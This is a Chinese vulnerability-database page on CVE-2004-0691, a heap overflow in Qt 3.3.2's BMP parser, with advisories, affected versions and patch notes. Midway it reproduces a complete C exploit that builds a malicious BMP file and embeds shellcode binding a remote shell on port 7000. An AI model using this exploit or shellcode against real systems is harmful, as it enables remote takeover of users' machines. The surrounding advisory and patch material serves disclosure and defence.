CVE-2004-0691
CVSS7.5
发布时间 :2004-09-28 00:00:00
修订时间 :2016-10-17 22:47:57
NMCOEPS    

[原文]Heap-based buffer overflow in the BMP image format parser for the QT library (qt3) before 3.3.3 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code.


[CNNVD]Qt图象文件缓冲区溢出漏洞(CNNVD-200409-076)

        
        Qt是一款C++应用开发工具,包括类库和跨平台开放工具。
        Qt包含多个安全问题,远程攻击者可以利用这些漏洞构建恶意图象文件,可能以进程权限在系统上执行任意指令。
        Qt库在处理8-bit RLE编码的BMP文件过程中存在基于堆的缓冲区溢出,远程攻击者可以建立特殊的BMP文件,诱使用户查看,可导致任意指令执行。
        同样在处理XPM,GIF和JPET图象文件时也存在此问题。
        实际上这个漏洞是由于libpng引起的,由于分配了CVE号,所以作为单独漏洞列出。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9485Heap-based buffer overflow in the BMP image format parser for the QT library (qt3) before 3.3.3 allows remote attackers to cause a denial of...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0691
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0691
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200409-076
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109295309008309&w=2
(UNKNOWN)  BUGTRAQ  20040818 CESA-2004-004: qt
http://security.gentoo.org/glsa/glsa-200408-20.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200408-20
http://sunsolve.sun.com/search/document.do?assetkey=1-66-201610-1
(UNKNOWN)  SUNALERT  201610
http://www.debian.org/security/2004/dsa-542
(UNKNOWN)  DEBIAN  DSA-542
http://www.mandriva.com/security/advisories?name=MDKSA-2004:085
(UNKNOWN)  MANDRAKE  MDKSA-2004:085
http://www.novell.com/linux/security/advisories/2004_27_qt3.html
(UNKNOWN)  SUSE  SUSE-SA:2004:027
http://www.redhat.com/support/errata/RHSA-2004-414.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:414
http://xforce.iss.net/xforce/xfdb/17040
(VENDOR_ADVISORY)  XF  qt-bmp-bo(17040)

- 漏洞信息

Qt图象文件缓冲区溢出漏洞
高危 边界条件错误
2004-09-28 00:00:00 2010-01-28 00:00:00
远程  
        
        Qt是一款C++应用开发工具,包括类库和跨平台开放工具。
        Qt包含多个安全问题,远程攻击者可以利用这些漏洞构建恶意图象文件,可能以进程权限在系统上执行任意指令。
        Qt库在处理8-bit RLE编码的BMP文件过程中存在基于堆的缓冲区溢出,远程攻击者可以建立特殊的BMP文件,诱使用户查看,可导致任意指令执行。
        同样在处理XPM,GIF和JPET图象文件时也存在此问题。
        实际上这个漏洞是由于libpng引起的,由于分配了CVE号,所以作为单独漏洞列出。
        

- 公告与补丁

        厂商补丁:
        Trolltech
        ---------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级版本Qt 3.3.3版本:
        
        http://www.trolltech.com/download/index.html

- 漏洞信息 (408)

Qt BMP Parsing Bug Heap Overflow Exploit (EDBID:408)
linux remote
2004-08-21 Verified
0 infamous41md
N/A [点击下载]
/*
*  heap overflow exploit for qt bmp parsing bug
*  infamous42md AT hotpop DOT com
*
*  shouts to mitakeet, MB, and peeps @hackaholic
*
*  ok, pretty standard heap overflow here. we spill across our chunk and
*  overwrite the boundary tag for next chunk.  the only problems i had was
*  finding a miserable jump slot to overwrite.  i thought i could just
*  overwrite malloc jump slot, but umm, well i'm not sure how to get the jump
*  slot for malloc from the shared library file.  it is some sort of offset
*  from somewhere, and i'm not sure where.  using the malloc jump slot from the
*  program you're exploiting doesn't seem to work.  sorry i'm not an expert on
*  linking and loading yet, maybe after i read the 'linker loader' book next
*  semester i will be... but perhaps someone could explain this to me?  so
*  anyways, instead i hijacked QWidget::setCaption() jump slot.  and how did i
*  find that? well, it sure wasn't a 1337 way.  i dumped the GOT in gdb until i
*  found the address.  so the below adddress is for Qt multithreaded 3.3.2. i'm
*  sure it is different for other machines/platforms, so you'll need to do some
*  digging i'm guessing.  the program i used to test all this was qvv image
*  viewer b/c it was small and didn't take 37 hours to d/l like Konqueror would
*  of.  obviously the heap layout is going to vary greatly from program to
*  program, and depending on at what point in a given program the bmp is
*  loaded, so i can't see this being a very reliable way to exploit.  rather
*  just a POC.
*
* [n00b@localho.outernet] netstat -ant | grep 7000
* [n00b@localho.outernet] gcc -Wall haqt.c
* [n00b@localho.outernet] ./a.out 0x80be9f8 8
* [n00b@localho.outernet] ./qvv suckit.bmp
* [n00b@localho.outernet] netstat -ant | grep 7000
* tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN
* [n00b@localho.outernet] ./a.out
*         Usage: ./a.out < retaddr > [ align ]
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>

#define RETLOC 0x808cd0c    /* jump slot for QWidget::setCaption */
#define ALIGN 8
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define OUTFILE "suckit.bmp"
#define NCHUNK_BYTES 100

/*  a bitmap header structure */
#define BMP_HDR_SZ sizeof(struct bmp)
struct bmp {
   u_char  type[2];
   u_int   bfsize,
           reserved,
           offbits,    /* BMP_FILEHDR_SIZE */
           bisize,     /* 40 */
           width,      /* 8 */
           height;     /* 18 */
   u_short planes,     /* 1 */
           bitcount;   /* 8 */
   u_int   compres,    /* 1 */
           szimg,
           xppm,
           ypppm,
           clrused,    /* 1 */
           clrimportant;
} __attribute__ ((packed));

/*  a dlmalloc chunk descriptor */
#define CHUNKSZ sizeof(mchunk_t)
typedef struct _mchunk {
   size_t  prevsz;
   size_t  sz;
   long    fd;
   long    bk;
} mchunk_t;

/* call them on port 7000, mine, and needs to lose some weight */
#define SHELL_LEN (sizeof(remote)-1)
char remote[] =
"\xeb\x0a""1234567890"  /* jump */
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\xa1\x5f\x66\x6e\x69";

void make_bmp(char *buf, int len)
{
   int fd = 0;

   /* create the 3vil file */
   if( (fd = open(OUTFILE, O_RDWR|O_CREAT, 0666)) < 0)
       die("open");

   if(write(fd, buf, len) < 0)
       die("write");

   close(fd);
}

/*
*
*/
int main(int argc, char **argv)
{
   int len = 0, x = 0, align = ALIGN;
   char    buf[BS];
   u_long  retaddr;
   struct bmp   bmp;
   mchunk_t    chunk;

   if(argc < 2){
       fprintf(stderr, "\tUsage: %s < retaddr > [ align ]\n", argv[0]);
       return EXIT_FAILURE;
   }
   if(argc > 2){
       align = atoi(argv[2]);
       if(align < 0 || align > 15)
           die("get bent bitch");
   }
   sscanf(argv[1], "%lx", &retaddr);

   /* setup bitmap header info */
   memset(&bmp, 0, BMP_HDR_SZ);
   bmp.type[0] = 'B', bmp.type[1] = 'M';
   bmp.bfsize = 3126;
   bmp.bisize = 40;
   bmp.planes = 1;
   bmp.bitcount = 8;
   bmp.compres = 1;
   bmp.clrused = 1;
   bmp.width = 8;
   bmp.height = 18;

   /* and the chunk */
   chunk.prevsz = 224;
   chunk.sz = 0xfffffffc;
   chunk.fd = RETLOC - 12;
   chunk.bk = retaddr;

   /* and now setup the buffer */
   memcpy(buf, &bmp, BMP_HDR_SZ);
   len += BMP_HDR_SZ;

   /* to pass some checks */
   len += 4;           /* the color table */
   buf[len++] = 0;     /* to pass the if() */
   buf[len++] = 0xff;  /* overwrite len */

   /*
    * and now the fun begins:
    * first splatter the chunks, then the shellcode
    */
   len += align;
   for(x = 0; x < NCHUNK_BYTES-CHUNKSZ-1; x += CHUNKSZ)
       memcpy(buf+len+x, &chunk, CHUNKSZ);
   len += x;
   memcpy(buf+len, remote, SHELL_LEN);
   len += SHELL_LEN;

   make_bmp(buf, len);
   return 0;
}


// milw0rm.com [2004-08-21]
		

- 漏洞信息 (F34094)

Chris Evans Security Advisory 2004.4 (PacketStormID:F34094)
2004-08-20 00:00:00
Chris Evans  scary.beasts.org
advisory,overflow
CVE-2004-0691
[点击下载]

qt version 3.3.2 has a heap overflow in its BMP parser.

CESA-2004-004 - rev 3

http://scary.beasts.org/security/CESA-2004-004.txt

qt 3.3.2 BMP parser heap overflow error
=======================================

Programs:          qt, and any programs which use qt to decode BMP files. For
                   example, KDE (including konqueror).
Severity:          Possible compromise of account used to browse malicious
BMP
                   files.
CAN identifier(s): CAN-2004-0691

This advisory notes a code flaw discovered by inspection of the qt code.
The specific version of qt discussed is v3.3.2.
qt-3.3.3 has already been released and it contains a fix for this issue.

Flaw 1. Heap-based overflow in read_dib (qimage.cpp).

The handling of 8-bit RLE encoded BMP files is faulty. Interestingly, the 4-bit
RLE encoding handling seems to have the required safety checks.
a) User supplied length used to read into heap buffer without adequate bounds
checking:
     default:    // absolute mode
          if ( d->readBlock( (char *)p, b ) != b )
b) User supplied length used to memset() a piece of heap buffer without
adequate bounds checking:
    } else {      // encoded mode
        memset( p, d->getch(), b ); // repeat pixel
c) User supplied delta pixel co-ordinates used without range checking:
      case 2:     // delta (jump)
          x += d->getch();
          y += d->getch();
          p = line[h-y-1] + x;

Demo BMP: http://scary.beasts.org/misc/bad.bmp (flaw 1a).


CESA-2004-004 - rev 3
Chris Evans
chris@scary.beasts.org

[Advertisement: I am interested in moving into a security related field
 full-time. E-mail me to discuss.]
    

- 漏洞信息

9026
Qt qimage.cpp read_dib Function BMP Handling Overflow
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in Trolltech Qt. The read_dib() fails to check user supplied d resulting in a buffer overflow in at least three blocks of code. With a specially crafted request, an attacker can execute arbitrary code with the privelege of the current user resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-08-18 2004-07-23
2004-08-21 Unknow

- 解决方案

Upgrade to version 3.3.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Multiple Qt Image Handling Heap Overflow Vulnerabilities
Boundary Condition Error 10977
Yes No
2004-08-19 12:00:00 2009-07-12 06:17:00
Discovery of these issues is credited to Chris Evans.

- 受影响的程序版本

Trolltech Qt 3.3.2
Trolltech Qt 3.3.1
Trolltech Qt 3.3 .0
Trolltech Qt 3.2.3
+ Conectiva Linux 10.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
Trolltech Qt 3.2.1
Trolltech Qt 3.1.2
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
Trolltech Qt 3.1.1
+ Conectiva Linux 9.0
Trolltech Qt 3.1
Trolltech Qt 3.0.5
Trolltech Qt 3.0.3
Trolltech Qt 3.0
Trolltech Qt 2.3.1
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
Sun Java Desktop System (JDS) 2.0
Sun Java Desktop System (JDS) 2003
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
RedHat Linux 9.0 i386
RedHat Linux 7.3 i686
RedHat Linux 7.3 i386
RedHat Linux 7.3
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Gentoo Linux 1.4
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya MN100
Avaya Intuity LX
Trolltech Qt 3.3.3

- 不受影响的程序版本

Trolltech Qt 3.3.3

- 漏洞讨论

Multiple heap overflows have been reported to exist in the Qt QImage library. These issues may be triggered when handling malformed images of various types, potentially causing a denial of service in applications that use the library to render images. Remote code execution is also possible.

- 漏洞利用

A proof-of-concept exploit has been provided by &lt;infamous41md@hotpop.com&gt;:

- 解决方案

SuSE has released advisory SUSE-SA:2004:035 mainly to address the vulnerability described in BID 11281. However, in the addendum of this advisory, it is reported that fixes for the issues described in this BID for the Opera browser are now available on the SuSE update FTP server for download. Customers are advised to see the referenced advisory for further information regarding obtaining and applying appropriate updates.

Red Hat has released advisory RHSA-2004:478-13 and fixes to address these and other issues on Red Hat Linux Enterprise platforms. Customers who are affected by these issues are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Mandrake has released advisory MDKSA-2004:085 to address this issue. Please see the attached advisory for further details on obtaining and applying fixes.

These issues have been addressed in Qt 3.3.3. It should be noted that applications that are statically compiled with the affected library will need to be recompiled against an updated version.

SUSE has released an advisory (SUSE-SA:2004:027) to address these issues. Please see the referenced advisory for more information.

RedHat has released an advisory (RHSA-2004:414-19) along with fixes to address these issues. Please see the referenced advisory for further information.

Gentoo Linux has released an advisory (GLSA 200408-20) along with fixes to address these issues. Please see the referenced advisory for further information. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge sync
emerge -pv ">=x11-libs/qt-3.3.3"
emerge ">=x11-libs/qt-3.3.3"

RedHat has released two advisories (FEDORA-2004-270, FEDORA-2004-271) to address these issues in Fedora Core 1 and Fedora Core 2. Please see the referenced advisories for more information.

Slackware has released an advisory (SSA:2004-236-01) to address these issues. Please see the referenced advisory for more information.

Debian has released an advisory (DSA 542-1) to address these issues. Please see the referenced advisory for more information.

Turbolinux has released an advisory (TLSA-2004-21) to address these issues. Please see the referenced advisory for more information.

Sun has released Sun Alert ID:57637 dealing with these issues. Sun advises users to updated the affected packages using the select the Online Update from the launch bar:

Launch >> Applications >> System Tools >> Online Update

For more information please see the referenced Sun web advisory.

Conectiva Linux has released an advisory (CLA-2004:866) along with fixes dealing with this issue. Please see the referenced advisory for more information.

Red Hat has released an advisory (RHSA-2004:479-05) to address these and other issues in Red Hat Enterprise Linux. Please see the referenced advisory for more information.

Avaya has released an advisory indication vulnerable packages. Avaya has suggested that upgrades will be available to address these issue. Please see the advisory at the following location for more information:

http://support.avaya.com/japple/css/japple?temp.groupID=128450&temp.selectedFamily=128451&temp.selectedProduct=154235&temp.selectedBucket=126655&temp.feedbackState=askForFeedback&temp.documentID=203389&PAGE=avaya.css.CSSLvl1Detail&executeTransaction=avaya.css.UsageUpdate()

Fedora Legacy has released advisory FLSA-2005:2314 dealing with this and other issues for the Fedora Core 1 and RedHat Linux packages. Please see the referenced advisory for more information.

The Fedora Legacy project has released advisory FLSA:152763 to address this issue in RedHat Linux 7.3, and 9. Please see the referenced advisory for further information.


Trolltech Qt 2.3.1

Trolltech Qt 3.0

Trolltech Qt 3.0.3

Trolltech Qt 3.0.5

Trolltech Qt 3.1

Trolltech Qt 3.1.1

Trolltech Qt 3.1.2

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站